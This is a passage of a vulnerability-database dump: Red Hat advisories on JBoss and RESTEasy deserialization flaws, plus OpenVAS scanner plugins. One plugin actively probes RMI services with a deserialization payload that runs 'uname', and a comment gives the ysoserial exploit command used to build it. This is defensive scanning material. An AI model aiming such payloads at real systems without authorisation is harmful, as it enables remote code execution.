An attacker could use this vulnerability to gain access to unauthorized information or conduct further attacks. (CVE-2015-5348)\n\nIt was found that bouncycastle is vulnerable to an invalid curve attack. An attacker could extract private keys used in elliptic curve cryptography with a few thousand queries. (CVE-2015-7940)\n\nThe CVE-2016-2141 issue was discovered by Dennis Reed (Red Hat).\n\nRefer to the Product Documentation link in the References section for installation instructions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-06T16:16:07", "type": "redhat", "title": "(RHSA-2016:2035) Important: Red Hat JBoss Fuse 6.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3192", "CVE-2015-5254", "CVE-2015-5344", "CVE-2015-5348", "CVE-2015-7940", "CVE-2016-2141", "CVE-2016-2510", "CVE-2016-4437"], "modified": "2019-02-20T12:29:07", "id": "RHSA-2016:2035", "href": "https://access.redhat.com/errata/RHSA-2016:2035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T16:21:59", "description": "Red Hat Process Automation Manager is an open source business 
process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis release of Red Hat Process Automation Manager 7.1.0 serves as an update to Red Hat Process Automation Manager 7.0.2, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* Resteasy: Yaml unmarshalling vulnerable to RCE (CVE-2016-9606)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting CVE-2016-9606.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-11T12:36:27", "type": "redhat", "title": "(RHSA-2018:2909) Moderate: Red Hat Process Automation Manager 7.1.0 bug fix and security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-10-11T12:36:42", "id": "RHSA-2018:2909", 
"href": "https://access.redhat.com/errata/RHSA-2018:2909", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-12T04:37:38", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis asynchronous patch is a security update for JBoss invoker in Red Hat JBoss Enterprise Application Platform 5.2.0.\n\nSecurity Fix(es):\n\n* jbossas: Arbitrary code execution via unrestricted deserialization in ReadOnlyAccessFilter of HTTP Invoker. (CVE-2017-12149)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Joao F M Figueiredo for reporting this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-17T18:11:20", "type": "redhat", "title": "(RHSA-2018:1607) Critical: Red Hat JBoss Enterprise Application Platform 5.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2018-06-06T22:37:45", "id": "RHSA-2018:1607", 
"href": "https://access.redhat.com/errata/RHSA-2018:1607", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-12T04:37:38", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis asynchronous patch is a security update for JBoss invoker in Red Hat JBoss Enterprise Application Platform 5.2.0.\n\nSecurity Fix(es):\n\n* jbossas: Arbitrary code execution via unrestricted deserialization in ReadOnlyAccessFilter of HTTP Invoker. (CVE-2017-12149)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Joao F M Figueiredo for reporting this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-17T18:15:33", "type": "redhat", "title": "(RHSA-2018:1608) Critical: Red Hat JBoss Enterprise Application Platform 5.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2018-05-17T18:16:03", "id": "RHSA-2018:1608", 
"href": "https://access.redhat.com/errata/RHSA-2018:1608", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-27T10:24:22", "description": "The jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2).\n\nWith this update, the jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 6.4.15.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T21:31:12", "type": "redhat", "title": "(RHSA-2017:1260) Moderate: jboss-ec2-eap security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2016-9606"], "modified": "2018-06-06T22:39:07", "id": "RHSA-2017:1260", "href": "https://access.redhat.com/errata/RHSA-2017:1260", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:29:22", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. 
KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T20:48:16", "type": "redhat", "title": "(RHSA-2017:1253) Moderate: Red Hat JBoss Enterprise Application Platform 6.4.15 update on RHEL 7", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-03-19T12:13:49", "id": "RHSA-2017:1253", "href": "https://access.redhat.com/errata/RHSA-2017:1253", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:29:22", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. 
An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T21:21:25", "type": "redhat", "title": "(RHSA-2017:1255) Moderate: Red Hat JBoss Enterprise Application Platform security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2017-07-24T20:07:31", "id": "RHSA-2017:1255", "href": "https://access.redhat.com/errata/RHSA-2017:1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T16:21:59", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business. 
\n\nThis release of Red Hat Decision Manager 7.1.0 serves as an update to Red Hat Decision Manager 7.0.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* Resteasy: Yaml unmarshalling vulnerable to RCE (CVE-2016-9606)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting CVE-2016-9606.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-11T14:17:21", "type": "redhat", "title": "(RHSA-2018:2913) Moderate: Red Hat Decision Manager 7.1.0 bug fix and security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-10-11T14:17:57", "id": "RHSA-2018:2913", "href": "https://access.redhat.com/errata/RHSA-2018:2913", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:29:22", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for 
Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T21:00:29", "type": "redhat", "title": "(RHSA-2017:1256) Moderate: Red Hat JBoss Enterprise Application Platform 6.4.15 update on RHEL 5", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2017-05-18T21:03:55", "id": "RHSA-2017:1256", "href": "https://access.redhat.com/errata/RHSA-2017:1256", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:29:22", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T20:36:30", "type": "redhat", "title": "(RHSA-2017:1254) Moderate: Red Hat JBoss Enterprise Application Platform 6.4.15 update on RHEL 6", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-06-06T22:39:06", "id": "RHSA-2017:1254", "href": "https://access.redhat.com/errata/RHSA-2017:1254", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:35:45", "description": "The remote host is affected by a remote code execution vulnerability", "cvss3": {}, "published": "2016-06-15T00:00:00", "type": "openvas", "title": "RMI Java Deserialization Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3642", "CVE-2016-1487"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310105765", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_rmi_service_java_deserialization.nasl 11961 2018-10-18 10:49:40Z asteins $\n#\n# RMI Java Deserialization Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105765\");\n script_version(\"$Revision: 11961 $\");\n script_cve_id(\"CVE-2016-3642\", \"CVE-2016-1487\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"RMI Java Deserialization Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/576313\");\n\n script_tag(name:\"vuldetect\", value:\"Execute the `uname' command and check the response.\");\n script_tag(name:\"insight\", value:\"The Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution. 
Java applications that either directly use ACC, or contain ACC in their classpath, may be vulnerable to arbitrary code execution.\");\n script_tag(name:\"solution\", value:\"Ask the vendor for an update/workaround\");\n script_tag(name:\"summary\", value:\"The remote host is affected by a remote code execution vulnerability\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 12:49:40 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-15 20:26:27 +0200 (Wed, 15 Jun 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_rmi_registry_detect.nasl\");\n script_require_ports(\"Services/rmi_registry\");\n\n exit(0);\n}\n\ninclude(\"byte_func.inc\");\n\nif( ! port = get_kb_item(\"Services/rmi_registry\") ) exit( 0 );\n\nsoc = open_sock_tcp( port );\n\nif( ! 
soc ) exit( 0 );\n\nreq = 'JRMI' + raw_string( 0x00, 0x02, 0x4b );\n\nsend(socket:soc, data:req);\nres = recv( socket:soc, length:128, min:7 );\n\nif( hexstr( res[0] ) != '4e' || ( getword( blob:res, pos:1 ) + 7 ) != strlen( res ) )\n{\n close( soc );\n exit( 0 );\n}\n\n# java -cp ysoserial-0.0.2-all.jar ysoserial.RMIRegistryExploit 192.168.2.44 1099 CommonsCollections1 'uname'\nreq = raw_string( ... );\n\nsend( socket:soc, data:req );\nres = recv( socket:soc, length:512 );\n\nclose( soc );\n\nif( \"Integer cannot be cast to java.util.Set\" >< res )\n{\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 0 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:24:50", "description": "This host is running Adobe ColdFusion and is\n prone to information disclosure and remote code execution vulnerabilities.", "cvss3": {}, "published": "2017-09-14T00:00:00", "type": "openvas", "title": "Adobe ColdFusion Remote Code Execution And Information Disclosure Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11286", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-11285"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310811696", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811696", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe ColdFusion Remote Code Execution And Information Disclosure Vulnerabilities\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:coldfusion\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811696\");\n script_version(\"2019-07-05T09:29:25+0000\");\n script_cve_id(\"CVE-2017-11286\", \"CVE-2017-11285\", \"CVE-2017-11283\", \"CVE-2017-11284\");\n script_bugtraq_id(100715, 100711, 100708);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:29:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 15:04:23 +0530 (Thu, 14 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Adobe ColdFusion Remote Code Execution And Information Disclosure Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Adobe ColdFusion and is\n prone to information disclosure and remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Improper Restriction of XML External Entity Reference.\n\n - Improper Neutralization of Input During Web Page Generation.\n\n - Deserialization of Untrusted Data.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code in the context of the affected application\n and gain access to sensitive information.\");\n\n script_tag(name:\"affected\", value:\"ColdFusion 11 before Update 13 and ColdFusion\n 2016 before update 5.\");\n\n 
script_tag(name:\"solution\", value:\"Upgrade to ColdFusion 11 Update 13 or 2016\n update 5 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/coldfusion/apsb17-30.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_coldfusion_detect.nasl\");\n script_mandatory_keys(\"coldfusion/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!cfPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\ncfdVer = get_app_version(cpe:CPE, port:cfPort);\nif(!cfdVer){\n exit(0);\n}\n\n#https://helpx.adobe.com/coldfusion/kb/coldfusion-11-update-13.html\nif(version_in_range(version:cfdVer, test_version:\"11.0\", test_version2:\"11.0.13.303667\")){\n fix = \"11.0.13.303668\";\n}\n#https://helpx.adobe.com/coldfusion/kb/coldfusion-2016-update-5.html\nelse if(version_in_range(version:cfdVer, test_version:\"2016.0\", test_version2:\"2016.0.05.303688\")){\n fix = \"2016.0.05.303689\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:cfdVer, fixed_version:fix);\n security_message(data:report, port:cfPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:30", "description": "vRealize Operations update addresses REST API deserialization vulnerability.", "cvss3": {}, "published": "2016-11-16T00:00:00", "type": "openvas", "title": "VMSA-2016-0020: vRealize Operations REST API Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7462"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310140063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140063", "sourceData": 
